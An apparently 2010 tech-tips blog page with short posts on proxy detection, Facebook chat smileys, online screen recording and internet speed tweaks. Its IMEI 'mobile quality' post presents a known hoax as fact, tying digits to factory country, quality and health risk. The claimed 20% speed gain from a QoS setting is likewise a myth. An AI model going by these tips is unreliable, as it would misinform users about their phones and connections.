    Proxy Detection Servies

    Now a days proxy detection has became a critical component, There some services like Fraud labs and Free Proxy Detector to detect the usage of proxy or spoofed IP from users participating online

    How Proxy Detection works?

    Proxy detection services mostly rely on IP addresses to determine whether or not the IP is a proxy, they keep a record of the IP's which most proxy's use as a Spoofed IP and therefore by comparing the IP with the list of flagged IP's they could find that the IP is a proxy or not, If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy.

    Hope you liked the post ! Please Pass the comments






    Saturday, October 9, 2010

    How to use smileys in Facebook chat?

    Facebook is the most popular social networking site in the world with an alexa rank of just #2, Recently I have been receiving many emails and I am constantly asked about smileys in Facebook chat, There are lots of smileys in Facebook chat but lots of people dont know about it, You can you smileys in Facebook chat and increase your Chatting experience, Below I am placing 2 charts which will contain smileys in Facebook chat along with their code




    Hope you liked the collection of Facebook chat smileys, Feel free to ask by commenting!







    QUALITY of your MOBILE

    What is the QUALITY of your MOBILE???JUST CHECK


    Would you like to know if your mobile is of good quality or not ?????

    Press the following on your mobile*#06# and the-international mobile equipment identity number appears. Then check the 7th and 8th numbers:

    IF the Seventh & Eighth digits are 02 or 20 this means your cell phone was assembled in Emirates which is VERY BAD QUALITY

    IF the Seventh & Eighth digits are 08 or 80 this means your cell phone was manufactured in Germany which is FAIR QUALITY

    IF the Seventh & Eighth digits are 01 or 10 this means your cell phone was manufactured in Finland which is VERY GOOD QUALITY

    IF the Seventh & Eighth digits are 00 this means your cell phone was manufactured in original factory which is the BEST MOBILE QUALITY

    IF the Seventh & Eighth digits are 13 this means your cell phone was assembled in Azerbaijan which is VERY BAD QUALITY AND ALSO BAD FOR HEALTH/

    This works in Nokia ONLY.






    Samsung launches new dual sim phone







    Record your screen ONLINE

    1) Go to http://www.screenr.com. You should see a yellow button that says "Record your screencast now!"

    2) After you have clicked it, it will ask you to run a java applet. Run it. Don't worry, it's not a driveby ;).

    3) Adjust the dimensions of the box until you get your desired screen size. When you are ready to record click the red record . Then, a red box will indicate that you are recording.

    4) When you are finished recording, press the DONE button just a little right from the original record button.

    Notes: You can only record up to 5 minutes of footage, you also MUST have a twitter account.

    I hope this will benefit some of you. Enjoy!






    Friday, October 8, 2010

    How to increase your internet speed



    The following post is on will tell you some methods to increase your internet speed,I will show you some ways to increase your net and browser speed

    Go to Start>>Run and then type in “gpedit.msc” without the quotes (“)

    Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler.
    after that, you should see something like “Limit Reservable Bandwidth”. Modify that and set it to “Disabled”, or you can put it to “Enabled” and change the value to 0.

    Now this will increase your internet speed by 20%


    Increase internet speed - method 2

    Below combination will speed up your surfing on the net. it is amazingly fast.

    Firefox + IDM + TCP Optimizer


    kindly do a speed test of your net connection before & after at http://speedtest.net to know what difference this software has made.

    1) Speed Up the Firefox.


    Just do the following steps:


    *
    Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

    network.http.pipelining
    network.http.proxy.pipelining
    network.http.pipelining.maxrequests

    * Alter the entries do as follows:

    Set "network.http.pipelining" to "true"

    Set "network.http.proxy.pipelining" to "true"

    Set "network.http.pipelining.maxrequests" to some number like 30.

    * Lastly right-click anywhere and select New-> Integer.
    Name it "nglayout.initialpaint.delay" and set its value to "0".


    Method 3

    Now Download & Install IDM. ( The Best Download Manager I've ever used. )

    CLick here to download

    TCP OPTIMIZER DOWNLOAD

    When u open TCP Optimizer, dont do anything, just select the option 'Optimal Settings' & apply the changes.
    In the next box, press OK and reboot.

    I have given several methods to speed up your internet ,Go ahead and try and see the magic






    Twitter Delicious Facebook Digg Stumbleupon Favorites More

     

    Recent Posts

    Join Me On Facebook

    200+ Followers

    Followers


    meet women in Ukraine contatore visite website counter

    Recent Comments

    Follow Me On Twitter

    1112+ Followers